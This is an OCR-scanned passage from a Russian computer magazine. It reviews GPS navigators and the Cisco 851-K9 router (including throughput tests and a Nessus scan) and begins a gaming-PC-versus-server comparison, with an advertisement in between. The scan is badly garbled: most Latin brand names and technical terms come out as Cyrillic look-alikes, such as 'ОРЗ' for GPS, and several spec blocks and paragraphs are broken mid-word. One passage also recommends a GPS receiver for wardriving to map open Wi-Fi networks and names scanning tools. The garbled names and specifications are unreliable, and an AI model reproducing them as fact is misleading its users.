ческих станций. Так как система односторон- 
няя, то есть твой девайс только принимает 
сигнал, то для определения местоположения 
на плоскости необходимы сигналы трех 
спутников, а для определения положения 
в пространстве — минимум четырех. Зная 
время прохождения радиоволны, приемник 
вычисляет удаленность каждого спутника, а, 



располагая их координатами, твой ОРЗ-ком- 
пьютер рассчитывает свое местоположение. 
Если через определенные промежутки 
времени сверять полученные цифры, то 
можно определить скорость и направление 
движения объекта. 

□ Сколько вешать? 

Вопрос точности в этом случае очень важен. 
К примеру, в горах проходит спасатель- 
ная операция: скалолаз сломал ногу и не 
может передвигаться самостоятельно. Он 
сумел вызвать спасателей и передал свои 
координаты, но в радиусе 100 метров может 
быть и пропасть, и ущелье, и лес. Но с другой 
стороны, террористы могут проказничать, 
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(ѵ|здз — система повышения точности данных, раз- і 

рабатываемая японским бюро гражданской авиации. 
Задействованы дополнительные спутники и наземные 
станции. Функционирует на территории Азии. 



тоже ориентируясь с помощью ОРЗ, и в тогда погрешность в десятки 
метров может спасти сотни жизней. Поэтому было решено ввести 
систему избирательного доступа или ЗА (Зеіесііѵе АѵаіІаЬіІіІу). При- 
оритет отдается военным, так как изначально ЫАѴЗТАР, а теперь ОРЗ 
разрабатывалась Министерством обороны и для военных нужд. Спе- 
циальные наземные станции или дополнительные спутники, имеющие 
постоянное местоположение, рассылают корректирующие сигналы. 
Купив дополнительное оборудование и подключив его к своему ОРЗ- 
приемнику, можно добиться точности в 1 м. 

Недавно введение погрешностей было отменено, но точность приема 
в городах увеличилась несильно — на территории Москвы удалось до- 
биться точности в 6 метров. Но не только от внедренных погрешностей 
страдали пользователи — отражения радиосигнала от зданий и круп- 
ных объектов также могут сбить с толку приемник. К счастью, инженеры 
решили эту проблему, и недавно в продажу поступили чипы ЗігТ Зіаг III, 
которые позволяют определять местоположение по отраженному от 
зданий сигналу. Эти чипы используются в девайсах, предназначенных 
для автомобильных навигационных систем или ОРЗ индивидуального 
пользования, и чаще всего устанавливаются в коммуникаторы. 

О Для чего тебе это нужно? 

Представь ситуацию: ты решил устроить небольшое путешествие 
на новой машине, а твои знания дорог ограничиваются кварталом, 
в котором ты живешь. Конечно, можно купить атлас дорог, но куда 
удобнее, если твой верный спутник — ноутбук — будет подсказывать 
тебе дорогу. 

В городе ты можешь использовать навигацию не только для нахож- 
дения оптимального пути до точки следования, но и при вардрайве: 
просто подключи ОРЗ-приемник к ноутбуку или КПК и отмечай на кар- 
те, где находятся открытые сети. В качестве старта можешь обратить 
внимание на такие программы, как ЫеіЗіитЫег, Кізтеі, ѴѴеІІепгеіТег, 
ТНС-ЯІЛ, ЕійегеаІ. 

В любом случае, с ОРЗ-приемником тебе будет значительно проще 
повторно найти нужную улицу с открытой точкой доступа или не про- 
пустить нужный поворот в незнакомом городе. 

О Методика тестирования 

Все устройства проходили испытания на городских улицах с плотной 
застройкой, что негативно влияло на качество принимаемого от спут- 
ников сигнала. Тем не менее, на трассах удавалось достичь точности 
позиционирования в 6 метров. По мере возможности навигаторы 
прошивались картой города для более точного определения места. 
Две модели, предназначенные для работы в связке «приемник — ноут 
(КПК)», подключались к компьютеру и снимались данные. 

О Вывод 

Мы посмотрели на навигаторы и вручили приз «Выбор редакции» 
самому дорогому, но самому приятному девайсу — Оагппіп ОРЗМАР 
276С за большой цветной дисплей и отличную расширяемость. 

А приз «Лучшая покупка» достался навигатору ОІоЬаІЗаі ВТ-338 
за универсальность и простоту эксплуатации. При этом ты смело 
можешь выбирать любой навигатор по своим средствам — все 
модели можно подключать к компьютеру и выводить координаты на 
большой экран. 
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СІоЬаІВаІ ВІІ-353 

..«•••МОО 



>1: нет 



Экран: нет 

Время автономной равоты: ^ 

Тип приемника: 20 каналов 
Интерфейс с компьютером: ызв 
Возможность расширения: нет 
Влагозащищенность: до 95% влажности 

Питание: по шине ІІЗВ 

^ приемник в виде большой таблетки выполняет 

прием и обработку сигнала, передаваемого спутник . 

Преимущество девайса в том, что он контактирует о 
компьютером по ПЗВ-интерфейсу, от него же чип получа 
питание Подключать его можно как к ноутбуку, так и к КП 

диодом, установленным в корпусе. ОЮЬаІЗаІ В 

мает нишу автомобильных навигаторов, так как переме- 

щаться с ноутбуком пешком не очень комфортно ». ато е 

можноуспешно использовать для вардраива. Магнитно 
основание «таблетки» позволяет закрепить гаджет ша кры- 
ше машины, а № ины провода должно хватить, чтобы; ус 
шовить ноутбук рядом о водителем. Эксплуатация ѲІоЬаІЗаІ 
В1)-353 возможна в широком диапазоне те>^рат7Р (от^ 
до +85 градусов Цельсия) и при влажности до 95 /о, то ест 

дождь, снегипеклоэтомудевайсунестрашны. 

Сердцем системы стал чипсет Зігі Зіаг III. Его преиму- 
щества перед другими чипами в том , что он 
правильно обрабатывать отраженный сигнал, сниж 
погрешность при ориентации. Возможность пР и ®^^ 
обработки сигнала одновременно от 20-ти спутников 
позитивно скажется на ориентировании. Минусы тако 
решения проистекают из плюсов: для работы необходим 

к мпьютеР соответственно, самымудобным вариантом 

эксплуатациистанетустановканавигационногокомплек- 

са в автомобиле. 

ГЛОНАСС (Гловальная Навигационная Спутниковая Система) 1 

— разработка СССР. Первый спутник был запущен в далеком % 
1982 году. Для полноценной эксплуатации необходимо 24 аппарата, 
из которых на орбите сейчас находятся 1 7. Система может быть 
использована как в военных, так и в гражданских целях. Интересу- 
ющий нас гражданский сектор позволяет определить координаты с 
точностью 50-70 метров, но при задействовании наземных станций 
точность возрастает. К концу 2007 года планируется завершить 
развертывание системы ГЛОНАСС. 
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Экран: 480x320, 256 цветов 

Время автономной равоты: 5-1 5 часов 
Тип приемника: 1 2 каналов 
Интерфейс с компьютером: ІІЗВ 
Возможность расширения: есть, флеш-карты 
ѲАВМІЫ 

Влагозащищенность: 30 минут на глубине 1 метр 
Питание: съемный Шоп аккумулятор 
Вес: 385 г 

Фаворит нашего теста- приемник Ѳагтіп ѲР5МАР 
276С. Этот навигатор предназначен больше для туристов, 
передвигающихся на наземном или водном транспорте, 
так как его габариты не очень соответствуют обычным 
туристическим параметрам. Довольно внушительный блок 
с поворотной антенной можно закрепить в авто или катере, 
для чего имеется специатьный идущий в комплекте крон- 
штейн. Синхронизация с компьютером по ЭЗВ позволяет 
не только установить или скачать точки и маршруты, но 
и обновить карту на сменном носителе. К сожалению, в 
текущую память записать карту не удалось. 

Теперь об эргономике. Это единственный навигатор в тес- 
те о цветным дисплеем. Изменяя уровень яркости, можно 
ощутимо корректировать время работы устройства. Есть 
возможность подключить эхолот и превратить навигатор 
в многофункциональный компьютер для путешествую- 
щих на катере. Кнопок управления много, и работать с 
ними довольно просто. Несмотря на практически полное 
отсутствие резиновых уплотнителей, девайс отвечает 
стандарту ІРХ7. что позволяет заливать его водой и ронять 
с небольшой высоты. Приемная антенна вращается, при 
желании ее можно демонтировать и подключить выносной 
блок. Поддерживается система ЕѲІЧОЗ, позволяющая 
увеличить точность позиционирования натерритории Рос- 
сии (подробнее про эту систему ты прочитаешь в нашем 
словарике терминов). Питается это чудо от съемного Ыоп 
аккумулятора и способно проработать до 1 5 часов. Воз- 
можно организовать питание от бортовой сети автомобиля 
или катера- для этого имеется специальный кабель. 

ѴААЗ (Уіііе Агеа Аидптепізгііоп Зуг+егп) — система, позволя- ^ 
ющая повысить точность позиционирования до трех метров 
без использования дополнительного оборудования благодаря 
установке наземных корректирующих станций. Действует в 
Северной Америке. 



«М-Соппесі №ѵіда1ог 1 00 



Экран: 1 20x1 60, 4 градации серого 

Время автономной равоты: 16 часов 

Тип приемника: 1 2 каналов 

Интерфейс с компьютером: іізв 

Возможность расширения: нет 

Влагозащищенность: 30 минут на глубине 1 метр 

Пит ание: 2 элемента АА 

Вес: 170 г 

Навигатор от ^-Соппесі: примечателен небольшим весом 
и достаточно скромными габаритами. В управлении ис- 
пользуются всего две кнопки и пятипозиционный джойстик. 
Прорезиненная окантовка и крышка предотвратят сколь- 
жение девайса в руке. Для удобства транспортировки 
прибор оснащен клипсой, кстати, достаточно хлипкой. При 
необходимости она отстегивается, а под ней находится 
контактная группа для подключения коммуникационного 
кабеля. Приятно, что поддерживается ІІЗВ-интерфейс, 
таким образом обеспечивается совместимость со всеми 
типами компьютеров, включая ноутбуки. 

Что касается работы, то здесь не все так гладко. Для нажа- 
тия кнопок джойстика требуются большие усилия. К мину- 
сам также можно отнести небольшой дисплей. А теперь о 
достоинствах. Русскоязычное меню легко освоить, даже 
не обращаясь к инструкции. Навигатор питается от двух 
батареек, так что при длительном путешествии проблем с 
навигацией возникнуть не должно. Задняя крышка фикси- 
руется не поворотным «ключом», а винтом, что позволяет 
регулировать плотность прилегания крышки, а значит 
— быть уверенным в герметичности. 

В комплект поставки включено зарядное устройство от 
прикуривателя, которое позволяет сэкономить батареи 
при путешествии на автомобиле. 

ЕСІЧ05 (Еигореап СеозіаНопагу Маѵіда'Моп Оѵегіау А 

Зегѵісез) — работа этой службы также направлена на 
улучшение точности позиционирования при использо- 
вании приемников систем ѲРЗ и ГЛОНАСС. Точность 
увеличена за счет использования наземных станций и до- 
полнительных спутников. Работает натерритории Европы 
и европейской части России. Точность — до пяти метров. 



багтіп ОР8МАР 276С к. 
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«М-Соппесі Ыаѵідаіог 101 
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Экр-ЗН: 1 28x64, 4 градации серого 

Время автономной равоты: 32 часов 
Т ип приемника: 1 2 каналов 
Инт ерфейс с компьютером: іізв 
Возможность расширения: есть, флеш-карты 
Зй/ММС 

Влагозащищенность: 30 минут на глубине 1 метр 
Питание: несъемный [_і-іоп аккумулятор 
Вес: 96 г 

Довольно привлекательная модель. Причем привлекает она 
своими габаритами. Размером с трЗ-плеер, внешне она его 
чем-то напоминает— небольшой монохромный дисплей и 
две кнопки: питание и пятипозиционный джойстик. Сразу 
настораживают размеры экрана. Действительно, карты 
местности на нее не выведешь, лишь координаты и точки. 
Правда можно при помощи компьютера определить коорди- 
наты точек и установить звуковое оповещение при прибли- 
жении к ним. Также к недостаткам можно отнести подсветку 
— она красная. В темноте приходится присматриваться, так 
как прочитать информацию достаточно сложно. 

А теперь необходимо сказать о достоинствах. Малый раз- 
мер позволяет носить девайс в кармане, не сильно отягощая 
тебя поклажей. Питается прибор от встроенного Шоп ак- 
кумулятора, который можно зарядить и от автомобильного 
прикуривателя, и от сети 220 В, для чего имеются специаль- 
ный адаптеры. Автономно навигатор может просущество- 
вать около 32 часов, если его не беспокоить и не включать 
подсветку. Синхронизация с компьютером осуществляется 
через ІІЗВ, при этом имеющуюся память можно расширить 
картами ЗО/ММС объемом до 2 Гб, на которые будут пи- 
саться маршрут и контрольные точки. После подключения 
к компьютеру можно наложить маршрут на карту и оценить 
свое путешествие. Примечательно, что девайс герметичен 
и не тонет. ІНІ 



СІоЬаІЗаі ВТ-338 



ЕСР5 (Дифференциальная СР5) — система повышения 
точности определения координат. Работает благодаря 
наличию наземных корректирующих станций. Для акти- 
вации системы необходим дополнительный приемник, 
который будет работать совместно с ѲРЗ. Услуги служб, 
предоставляющих ОѲРЗ, чаще всего платные. 



Экран: нет 

Время автономной равоты: 15 часов 
Тип приемника: 20 каналов 
Интерфейс с компьютером: Ыиеіоойі 
Возможность расширения: нет 
Влагозащищенность: до 95% влажности 
Питание: съемный Шоп аккумулятор 1700 мА/ч 

0р^. р 

Это единственный беспроводной приемник ѲРЗ в нашем 
тесте. Синхронизируется он с компьютером или КПК по 
интерфейсу ЫиейоІИ. С помощью такого приемника можно 
создать навигационную систему на базе как но^бука, так 
и КПК. К сожалению, в комплект не входит картографи 
ческое ПО, но зато в маленькой коробке можно наити 2 
зарядных устройства: сетевой адаптер и питание от прику- 
ривателя авто. Кроме того, имеется специальный чехол для 
переноски девайса на поясе. 

Проверим навигатор в деле. Синхронизация по ЫиейоІИ не 
составляет труда. На девайсе имеются 3 светодиодных инди- 
катора, оповещающих о режимах работы , но режимы работы 
индикаторов не назовешь интуитивно понятными. Благодаря 
новому чипу ЗІП Зіаг III девайс способен улавливать отра- 
женный от зданий сигнал и будет неплохой основой нави- 
гационного комплекса в большом городе. При испытаниях 
приемник смог поймать сигнал спутников, находясь втрех 
метрах от окна. Погрешность при этом составила порядка 
50 метров. Величина большая, но определить район можно. 
Питает девайс съемный Шоп аккумулятор, способн 
поддерживать работу ѲЮЬаІЗаІ ВТ-338 в течение 1 5 часов, 
а малые габариты и вес устройства позволяют всегда и 
вѳздѳ носить его с собой. 



I 



іезПаЬ выражает благодарность за предоставленное на тестирование оборудование компании «НИКС — Компьютерный 
Супермаркет» (т. ( 495) 974-3333, ѵѵѵѵѵѵ.піх.пЛ 
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ИГОРЬ ФЕДЮКИН 
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),100 Мбит/сек, Сопэоіе (В^І- 

іУНКЦИИ РОУТЕРА. Р 

ІНЕ РРРоЕ.РРРоА.МАТ 
ЭупО№,и2ТР.'Р5ео.ао : 

ФУНКЦИИ ФАЙРВОЛА: - 

1_ізіз, зіаіеіиіі Іпзресіюп 
АЕЗ Епсгур^іоп 

ДОПОЛНИТЕЛЬНО: поде 

ѵ річ1 разз-ТЬгоидЬ 
Зраппіпд Тгее РгсЛосоІ 
ЦЕНА: $285 
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РОУТЕР СІ5С0 л 
5Ѵ5ТЕМ5 851-К9 



□ росматривая различные форумы, 
частенько встречаешься с же- 
ланием ряда юзеров применять 
«серьезное» оборудование для 
доступа в интернет. Видимо, существует не- 
кий стереотип, заключающийся в том, что раз 
компания производит дорогое и качественное 
операторское железо, то и доступные по цене 
продукты ее производства так же хороши. 
Ярким примером тому является Сізсо Зузіетз 
как наиболее известная и уважаемая компа- 
ния на рынке сетевого оборудования. Однако 
применимо ли ее оборудование в домашних 
условиях? Здесь нужно принимать во внима- 
ние то, что полноценная настройка «кошек» 
возможна только из командной строки и, со- 
ответственно, требует глубокого понимания 
сетевых технологий и знания синтаксиса язы- 
ка фирменного зНеІІ’а. Ну, и конечно, лейбл 



Сізсо Зузіетз вовсе не говорит о том, что 
девайс умеет все на свете. Чтобы не быть 
голословными, рассмотрим возможность 
использования роутеров Сізсо Зузіетз 
в домашних условиях на примере относи- 
тельно доступной по цене модели — Сізсо 
Зузіетз 851 -К9. 

ОВнешнийвиди комплектация 

Как и все оборудование корпоративного 
класса, роутер поставляется в невзрачной 
картонной коробке. В ней находится сам роу- 
тер, адаптер питания, консольный кабель для 
настройки через СОМ-порт, 2 патч-корда ІІТР 
пятой категории, компакт-диске фирмен- 
ным программным обеспечением, краткая 
инструкция по устройству и несколько 
брошюр Сізсо Зузіетз. По своим габа- 
ритам Сізсо Зузіетз 851-К9 примерно 
в 2 раза больше типичных роутеров, изна- 
чально ориентированных на домашнее ис- 
пользование. Учитывая размеры и строгий 
внешний вид, маршрутизатор производит 
впечатление очень серьезной железки. 

На морде роутера располагаются светодиоды 
активности І_АІ\І-сегмента, статуса готовности 
к работе, активности ѴѴАІЧ-порта, а также 
РРР- и ѴРЫ-соединений. С тыльной стороны 
находятся разъемы для подключения питания, 
замка Кенсингтона, 4 порта Еіііегпеі В^45 
І_АІ\І-сегмента, 1 РѵМ5 ѴѴАІМ-порт и ПѵА45-порт 
для подключения консольного кабеля, кнопки 
«роѵѵег» и «гезеі». 



ОУправлениеи настройка 

Конфигурировать девайс можно как пос- 
редством ѵѵеЬ-интерфейса, таки с помощью 
командной строки, непосредственно подклю- 
чившись консольным кабелем или удаленно 
через іеіпеі или ззН. ѴѴеЬ-интерфейс довольно 
удобный, не перегруженный функциональ- 
ностью, но, как и следует, не позволяющий 
гибко настраивать роутер. Доступны следую- 
щие группы настроек: 

• Вазіс Сопіідигаііоп (задание имени роутера 

и пользовательских аккаунтов для настройки); 

• 1_АЫ (ІР-адрес и маска внутренней сети; 
после введения этот адрес назначается 
интерфейсу ѴІ_АЫ 1 , в который по умолчанию 
включены все порты свитча); 

• ІЩегпеі-ѴѴАЫ (настройка типа подключения 
наѴѴАЫ-интерфейсе; есть 2 варианта: соеди- 
нение Зіаііс ІР и РРРоЕ); 

• РігеѵѵаІІ (можно включить или выключить; 
при включении в конфиге создается две 
группы ассезз Іізі’ов, разрешающих любые 
соединения из 1_АЫ в ѴѴАЫ, ІСМР-трафик 
извне и запрещающих все остальное; любое 
редактирование или добавление правил 
доступно только через консоль); 

• ЭНСР (возможно поднять ОНСР-сервер, 
который будет автоматически раздавать ІР- 
адреса из указанного пула, а также доменное 
имя и адреса ВЫЗ-серверов); 

• ЫАТ (здесь настраивается соответствие вне- 
шних портов роутера внутренним ІР-адресам 
пользователей сети, так называемый Зіаііс РАТ); 
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Пропускная способность 




□ РОХ 
■ І_АЫ-ѴѴАЫ 



► Скоростные показатели всехтипов 
возможных соединений. Представлены 
результаты при однонаправленной 
(ѴѴАМ -> І_АМ и І_АМ -> ѴѴАМ) и полнодуплек- 
сной (РРХ) передаче 






• ВоіЛіпд (настройка статической 
маршрутизации); 

• Зесигііу (здесь предлагается ввести до- 
полнительное блокирование определенных 
сервисов, включить детальное логирование 
событий и криптование паролей). 

Также в ѵѵеЬ-интерфейсе реализуется функ- 
ция обновления прошивки. 

□ Функциональные возможности 

Как уже было сказано ранее, большая 
часть настроек доступна исключительно 
через консольный интерфейс. Роутер 
функционирует под управлением полно- 
ценной операционной системы Сізсо 103. 
Находятся, правда, и «мертвые» команды, 
такие как, например, вход в меню настроек 
несуществующих интерфейсов (СОМА-Іх, 
ѴІР) или конфигурирование неподдержи- 
ваемых протоколов (ЕІОРР, Ргате-Реіау). 
Однако если ты имел опыт работы с 103, 
все будет знакомо и понятно. Также 
к командам и процессу настройки в целом 
будет нетрудно привыкнуть заядлым 
линуксоидам. 

Теперь о том, что умеет «кошка». Встроенный 
свитч работает только на втором уровне 



модели 031. Для него доступны настройки 
виртуальных сетей (ѴІ_АІ\І) и определение до 
16-ти очередей с различными приоритетами 
(ѴѴеідІтіесІ РаігОиеиіпд). Непосредственно тра- 
фик шейпинг доступен только для РРРоЕ-со- 
единения. На ѴѴАІМ-интерфейсе можно 
задавать статический ІР-адрес, поднимать 
РРРоЕ-кпиент или ІРЗес-туннель. Также име- 
ется возможность работать с туннелями І_2ТР, 
однако поддержка более распространенного 
у нас РРТР отсутствует напрочь. Разумеется, 
есть полный набор таких необходимых вещей, 
как трансляция портов І\ІАТ (Зіаііс/Оупатіс/РАТ) 
и фильтрации нежелательного трафика на 
основе фирменных Ассезз Ызі’ов. 

□ Методика тестирования 

Несмотря на то что данный девайс принадле- 
жит к корпоративному сегменту рынка, где 
большее значение имеет функциональность 
железа, мы провели ряд стандартных замеров 
производительности, для того чтобы понять, 
насколько «корпоративное» железо быстрее 
или медленнее «обычного». 

Для тестирования проводного сегмента 
использовался программный продукт ІМеіЮ 
СНагіоіи скрипт ТНгоидІтриі с передачей паке- 



тов максимального объема. На двух станциях 
устанавливались так называемые епброіпі- 
программы, затем в консоле ЫеЮ СІтагіоі 
запускался скрипт генерации трафика. 

По умолчанию девайс работает в режиме 
чистой маршрутизации на третьем уровне 
модели 031 без задействования І\ІАТ. Меха- 
низм работы в таком случае отличается тем, 
что роутер не изменяет заголовок ІР-пакета, 
подставляя в него свой ІР-адрес (ка^ это 
происходит в случае ЫАТ), и, соответственно, 
тратит меньше процессорного времени на 
обработку каждого пакета. Следовательно, 
пропускная способность при таком раскладе 
должна быть больше, нежели в случае с ЫАТ. 

1 . При тестировании режима «чистого роутин- 
га» одна из станций подключалась к одному 
из портов свитча (интерфейс І_АІ\І), другая 

— к ѴѴАЫ-порту. Таким образом, мы полу- 
чали пиковую пропускную способность для 
ѴѴАІМ-интерфейса. Скорость тестировалась 
как в режиме однонаправленной передачи 
(направления І_АІ\І -> ѴѴАІ\І и ѴѴАІ\І -> І_АЫ), так 
и в режиме полного дуплекса (Ібх). 

2. Следующим этапом тестирования стал 
замер пропускной способности ЫАТ. В на- 
стройках роутера явно обозначались ѴѴАІМ- 
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>При полнодуплексной передаче в режиме МАТ роутер «отдает предпочтение» трафику в направлении ѴѴАМ -> І_АМ. Как видно на гра- 
фике, он почти в 2,5 раза превышаеттрафик в направлении І_АМ -> ѴѴАМ 
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>Таквыглядитпроцесс передачи данных в режиметрансляции портов НАТ в направлении ѴѴАІ\І->І_АМ 
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и І_АІ\І-интерфейсы (команды ір паі іпзісіе и ір 
паі оиізісіе) и задавался режим статической 
трансляции опе-іо-опе (ір паі іпзісіе зоигсе 
зіаііс А. В. С. О А. В. С. й), для того чтобы 
трафик мог ходить по всем портам в обе 
стороны. 

3. Дальнейшей надстройкой стало включе- 
ние файрвола, еще больше нагружающего 
центральный процессор роутера. С помощью 
ассезз-Іізі’ов были созданы правила, разре- 
шающие трафик по указанным ІР-адресам 
изѴѴАЫ в І_АІ\І и обратно, остальной трафик 
должен был фильтроваться. 



4. В качестве дополнительного исследова- 
ния была проведена проверка науязвимости 
со стороны ѴѴАЫ-интерфейса с помощью 
программного продукта ТепаЫе Ыеззиз. 

□ Результаты тестов 

В режиме «чистой маршрутизации» 
пропускная способность в направлении 
І_АІ\І -> ѴѴАЫ и ѴѴАЫ -> І_АЫ находится при- 
мерно на одном уровне в ~85 Мбит/сек. 

В режиме полнодуплексной передачи 
скорость достигает 1 06,84 Мбит/сек. 
Трансляция портов І\ІАТ дает приблизитель- 



>Так выглядитфирменный ѵѵеЬ-интерфейс настройки роутера Сізсо 5РМ Ехргезз 




но равную скорость в обоих направлениях. 

В среднем она составляет около 62 Мбит/ 
сек. В полном дуплексе получаем пропуск- 
ную способность, равную 65,61 Мбит/сек. 
Включение файрвола снижает скорость 
почти вдвое. Причем здесь в режиме пол- 
ного дуплекса скорость даже чуть меньше, 
нежели в режиме однонаправленной пере- 
дачи. В последнем случае пропускная спо- 
собность составляет порядка 35 Мбит/сек, 
в полном дуплексе — 33,95 Мбит/сек. 
Сканирование ТепаЫе ІМеззиз проводилось 
в режимах с включенным и выключенным 
файрволом. В обоих случаях не было выяв- 
лено ни одного открытого порта у роутера. 
Таким образом, можно считать, что он 
лишен серьезных уязвимостей. С полным 
отчетом о сканировании ты сможешь озна- 
комиться на нашем диске. 

□ Выводы 

Маршрутизатор Сізсо Зузіетз 851 -К9 
является хорошим выбором, но только для 
решения узкого круга задач. Для начи- 
нающих юзеров, незнакомых с сетевыми 
технологиями и оборудованием Сізсо 
Зузіетз в частности, он покажется слишком 
сложным в плане настройки. Отсутствие 
поддержки соединений по протоколу РРТР 
также делает невозможным его применение 
в качестве интернет-шлюза в ряде район- 
ных еІІтегпеРсетей. В остальном же роутер 
является типичным представителем железа 
«корпоративного» класса, для которого его 
скоростные и функциональные возможнос- 
ти вполне соответствуют цене. □С 



ІезПаЬ выражает благодарность за пре- 
доставленное на тестирование оборудо- 
вание компании Хсот (т. (495) 799-9600, 
ѵѵѵѵѵѵ.хсот.ги ). 
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Позови , когда будет 
мой любимый клип! 



Не волнуйся, я запишу. 

ттАУШЕА мс 
Все может! г-» 



ГЛАВНОЕ - это ИДЕЯ! 



Тебе нужен цифровой видеомагнитофон, фотоальбом, ОѴО-проигрыватель, 
телик с электронной программой передач, радио, тр-3 и Сй-плеер? 

КгаНшау Шеа МС на базе процессора ІпіеІ® Соге™ 2 Оио легко заменит тебе это. 

И не забудь, что это еще и мощный ИГРОВОЙ КОМПЬЮТЕР! 

Кгайѵѵау рекомендует лицензионную ОС ѴѴіпсіоѵѵз® ХР Месііа Сепіег ЕсШіоп. 



СПРАШИВАЙТЕ В МАГАЗИНАХ ЭЛЕКТРОНИКИ 

Белый Ветер — ЦИФРОВОЙ М. ВИДЕО 

тел: (495) 730-30-30 тел: 8-800-777-777-5 




фкгаПмву* 

ТЕХНОЛОГИИ ДЛЯ ЛЮДЕЙ 



ТВ-тюнер и пульт в стандартный комплект поставки не входят. Внешний вид товара может быть изменен без предварительного уведомления. Товар сертифицирован. 

Соге Іпзісіе, ІпіеІ, ІпіеІ І_одо, ІпіеІ Соге, ІпіеІ Іпзісіе, ІпіеІ Іпзібе Ьодо являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации ІпТеІ или ее подразделениям на территории США и других стран. 





Пехігоп Ѵір ТесГі 1 

Процессор, ГГ ц:2,93, ІпіеІ Соге 2 Оио 
Ехігѳте Х6800 (Сопгое) 

Системная плата: Іпііеі 0975ХВХ 
Чипсет: ІпіѳІ І975Х 

Оперативная память, Мв: 2x1 024, Затзипд 
ООЯ2-667 

Видеоплата, Мб: 512, ІХІѴЮІА ОеРогсе 
78000ТХ 

Винчестер, Г в: 750, Зеадаіе 7200 РРМ 
ЗАТА; 300, ѴѴезіегп ОідііаІ 7200 РРМ ЗАТА 
Оптический привод: АЗЕІЗ ОВѴѴ-1 608РЗЗ 
Связь: ОідаЬіі І_АЫ 
ОС: ѴѴіпсІоѵѵз ХР РгоІеззіопаІ ЕсІШоп 



Х-Сот 2500 ^ 

Процессор, ГГ ц: 1 ,6, ІпіеІ Хеоп 5110 
(ѴѴообсгезі) 

Системная плата: ІпіеІ 35000РАЕ 
Чипсет: ІпіеІ 5000Р 

Оперативная память, Мв: 2x1 024, Кіпдзіоп 
ООВ2-533 ЕСС 

Видеоплата, Мв: 16, АН Е31000 
Винчестер, Г в: 7x350, Зеадаіе 7200 РРМ 
ЗАТА 

Оптический привод: РЮІХЕЕВ ОѴО-ВѴѴ ОѴВ- 
К16 

Связь: 2хОідаЬіі І_АЫ 
ОС: ѴѴіпсІоѵѵз Зегѵег 2003 



ного ли отличий между твоей 
домашней тачкой и крутейшим 
сервером (файловым, корпора- 
тивной базы данных, да мало ли 
чего)? Чтобы понять это, придется вспом- 
нить, что такое сервер вообще. Конечно, это 
довольно широкое понятие: сервером можно 
назвать как любую тачку с установленным 
и настроенным соответствующим софтом 
(АрасГіе, Зегѵ-ЕІ, ѴѴіпРгоху и даже Соипіег- 
Зігіке позволяют назвать комп сервером 
того или иного вида услуг), так и узкоспеци- 
ализированную систему, адаптированную 
под определенный вид деятельности. Нас 
интересует именно последний случай. 

У «аппаратных» серваков, как правило, 
значительно расширены одни подсистемы 
(дисковая, сетевая и т.д.) и урезаны другие, 
ненужные для работы (видео). 

Так к чему мы все это? К нам в руки попало 
две совершенно разные системы: мощный 
игровой десктоп и навороченный сервер. 
Незамедлительно возникшая у нас идея 
была проста: а почему бы не сравнить их 
производительность в разного рода 
приложениях? 

Сказано — сделано! Обе тачки (язык с тру- 
дом поворачивается назвать сервер «тач- 
кой») были исследованы и протестированы. 
Перед тем как описать, что у нас вышло, 
расскажем о самих системах. 



□ РІехІгопѴірТесН 

Г еймерская система от компании «Ф-Центр» 
на поверку оказалась чрезвычайно мощным 
решением! Внутри — процессор ІпІеІ Соге 
2 Оио, а это почти 3 ГГц частоты, 2 ядра, и 4 Мб 
кэша второго уровня! Стоит ли и говорить 
о том, что архитектура Сопгое рвет устареваю- 
щую ЫеіВигзІ (процессоры ІпіеІ Репйит 4) 
и практически все современные камни АМО, 
а модель Х6800 к тому же является еще 
и самой мощной в линейке! Кстати говоря, по 
своей сути это аналог процессоров Ехігете 
Ебіііоп, которые всегда славились самыми 
лучшими характеристиками и страшно куса- 
чей ценой. Установлен камушек на топовой 
материнской плате Іпііеі 0975ХВХ, ничем 
особо не выдающейся, кроме разве что трех 
слотов РСІ Ехргезз XI 6 и неплохого охлаж- 
дения. Нам, в общем-то, больше ничего и не 
надо: дизайн и функциональные заморочки 
— конек таких производителей, как Азиз, МЗІ 
и СідаЬуіе. ІпіеІ же как раз славится просты- 
ми, но качественными и стабильными мамка- 
ми — «родной» производитель как-никак! 
Память обнаружилась в очень актуальном 
сейчас объеме — 2 Гб (2 модуля Затзипд 
ООР2-667). Для игровой системы самое то. 
Видеоподсистема представлена мощной 
платой ІЧѴЮІА ОеРогсе 7900ѲТХ. Здесь все 
тривиально: чип 071 , 51 2 Мб памяти ОООР-3 
и 256-битная шина — настоящий ЗО-монстр. 
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Нѳ отстают от всего вышеперечисленного 
и харды — в этом системнике мы обнаружили 
целых 2 накопителя, причем совершенно 
разных: 750-гигабайтный зверь отЗеадаіе 
и малыш на 300 Гб производства ѴѴезіегп 
ОідііаІ. 

ОХ-Сот2500 

Архитектура построения сервера по большому 
счету не отличается от архитектуры в домашних 
и офисных компах — компоненты используют- 
ся похожие, только гораздо более оптимизи- 
рованные под конкретные задачи. Вот и в этом 
немаленьком, надежно защищенном со всех 
сторон корпусе мы обнаружили двухпроцес- 
сорную материнскую плату ІпіеІ 55000РАІ_ 
(чипсет ІпіеІ 5000Р) и, соответственно, 2 камуш- 
ка ІпіеІ Хеоп 5110 (частота — 1 600 МГц). 
Архитектура, на которой построены процес- 
соры, опять же обновленная — в серверном 
исполнении ядро называется ѴѴообсгезі. 

2 процессора, по 2 высокопроизводительных 
ядра в каждом — итого мы имеем фактичес- 
ки четырехпроцессорную систему! Память 
с ними работает, само собой, не простая, 
а буферизованная и надежно защищенная 
от ошибок технологией ЕСС. Представлена 
эта красотища двумя гигабайтными модулями 
Кіпдзіоп. 

Дисковая подсистема — один из основных 
компонентов сервера — поразила нас больше 



всего. Целых 7 (!) жестких дисков Зеадаіе 
были объединены в РАЮ-массив, обеспечи- 
вающий доступное пространство в 750 Г б 
(сокращенный из-за резервирования данных). 
Отдельно упомянем охлаждение. Как правило, 
для сервера это одна из важнейших составля- 
ющих — здесь первостепенны стабильность 
и надежность, а не комфорт. Неудивительно, 
что система охлаждается целым массивом 
скоростных вентиляторов, воющих так, что 
в комнате с сервером могут спокойно нахо- 
диться только самые выносливые. Отметим, 
что на процессорах установлены голые мед- 
ные радиаторы. Мощнейший поток воздуха от 
вентиляторов продувает их, а также стоящие 
следом модули памяти и уже затем выводится 
из корпуса. 

Если говорить о видеоподсистеме, то серверу 
Х-Сот похвастаться нечем: дело в том, что 
такой системе ЗО-возможности ни к чему, 
а видеочипсет используется лишь для вывода 
изображения на экран монитора. В результате 
нам досталось простенькое интегрированное 
видео АН Е31000, работающее с 16-битной 
